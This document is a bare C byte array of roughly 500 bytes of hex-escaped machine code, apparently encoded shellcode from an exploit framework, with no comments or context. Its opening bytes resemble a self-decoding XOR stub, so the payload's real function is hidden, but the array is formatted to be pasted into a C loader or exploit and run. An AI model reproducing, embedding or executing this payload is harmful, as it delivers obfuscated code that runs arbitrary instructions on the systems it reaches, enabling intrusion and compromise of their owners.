unsigned char buf[] = 
"\xba\x18\xfa\xbc\xeb\xd9\xec\xd9\x74\x24\xf4\x5e\x31\xc9\xb1"
"\x79\x83\xc6\x04\x31\x56\x0f\x03\x56\x17\x18\x49\x51\xe3\xe8"
"\xdb\x54\x30\xc3\xc5\xed\xe2\x10\xab\x26\x23\x69\x26\x08\xe5"
"\x9e\xc4\x3c\x1d\x1c\x0c\xc4\x3b\xe3\x04\xdf\x67\xc9\x40\x3b"
"\x2f\xaf\x0e\x51\xe7\x7f\xd0\xfb\x8f\xed\x54\x52\x9c\xe4\x6a"
"\xb4\x13\xd6\xa7\x74\xec\xd1\xbb\x2b\x01\x5b\x5b\x1b\x4c\x35"
"\x9c\x45\x2c\xea\x9d\xa5\xee\xa3\x33\x5d\x9b\xc1\xf7\x2d\x40"
"\x04\x17\xf3\x64\x32\xeb\x9a\x6d\xda\x70\x0e\x31\x83\x52\x2f"
"\x1c\x25\xa1\xca\x4d\x03\x6c\x49\xd9\x4f\x8e\xde\x48\x27\xee"
"\x1e\xca\xae\xa8\xb8\x50\xad\x66\x1d\x83\x6a\xad\x03\x78\x58"
"\x10\x42\xce\x37\x76\xf6\x3b\x7b\x6f\x47\x91\x7c\xd9\x1b\xf0"
"\x47\xe9\x84\x94\xac\xf0\x5d\x5c\xfb\x73\xac\x73\x8a\xe5\x50"
"\xd5\xe0\xda\x10\xd6\xd1\x50\x7c\x7c\x60\xb4\x7b\xb8\x50\xa8"
"\x86\x30\x61\xe3\xe3\x59\x13\xac\x29\x07\x78\x9b\x78\x82\x01"
"\x08\x9c\x8a\xb1\x90\x3b\x32\xba\x74\xe0\xc2\x82\x71\x3e\x3b"
"\x5d\x38\x89\xcd\xba\x57\xfe\x19\xf1\x80\xff\x1f\xe1\x67\x59"
"\x7a\x21\x0f\xbb\xad\xe5\x5b\x6f\xbf\x8e\x7c\xcc\xb2\x53\xe1"
"\x02\x75\xb7\xbe\xdd\xf4\xf8\xc2\x71\xf1\xf4\x31\xf3\x34\x44"
"\x66\xac\xbf\x8d\xe3\x69\x9e\x43\xe3\x17\x2a\x65\x14\xd6\x9c"
"\x0d\x7c\xaf\x59\xf3\xbb\x7a\xb6\x1a\x54\xe5\x0f\xae\xa5\x3a"
"\x98\x6a\x19\x1a\xb1\xe1\xb6\x34\xf2\xa9\xd7\xd0\x50\x2a\xf2"
"\x67\xfb\x61\x60\x54\x5b\x70\xeb\x33\xa4\xe6\x1f\x3c\x24\x13"
"\xb6\x94\xea\x87\xef\x1e\x56\x85\x19\x13\xc6\xf4\xe8\xd0\x2f"
"\x69\x3d\x5d\xd3\xbd\xad\x72\xbd\x94\x7f\x45\x23\x90\xe2\x4e"
"\x1e\x4c\x6a\xec\xca\x08\xcd\xba\xd9\xea\xde\xfe\xfc\xb5\x4b"
"\x66\xf8\xe8\xd6\x88\x8c\x24\xb8\xdb\xae\x9d\x45\x01\x69\x80"
"\xdb\x6a\xad\x38\xd6\xa1\x38\xe8\x4d\x19\x96\x47\xde\xc4\x4f"
"\xe0\x3b\x50\xbf\xd7\x4d\xb1\x36\x50\x1c\xbb\x21\xd8\xdb\x12"
"\x3f\xf5\xd7\x39\x82\xe0\x78\x5f\xc1\x1b\x0a\xbf\x6c\x13\x79"
"\xe0\x2b\x44\xec\xc0\xd6\x24\xd1\x48\xa5\x20\x64\x14\x17\x07"
"\x2e\x27\xf8\xfb\x1b\x0f\xe1\x9f\xce\x77\x1a\x6f\x72\x37\x01"
"\xb0\xd6\x9b\x3f\x29\x26\x3f\xc3\xa6\xf7\x5c\x46\x06\xbb\x89"
"\xb0\x38\x2f\xa1\x6d\xca\x81\xad\xc3\x57\x3f\x8f\x7b\x05\x4d"
"\xbc\xcb\xe4\x7b\xf9\x2e\x14\x07\x28\x55\x1d\x8c\x27";
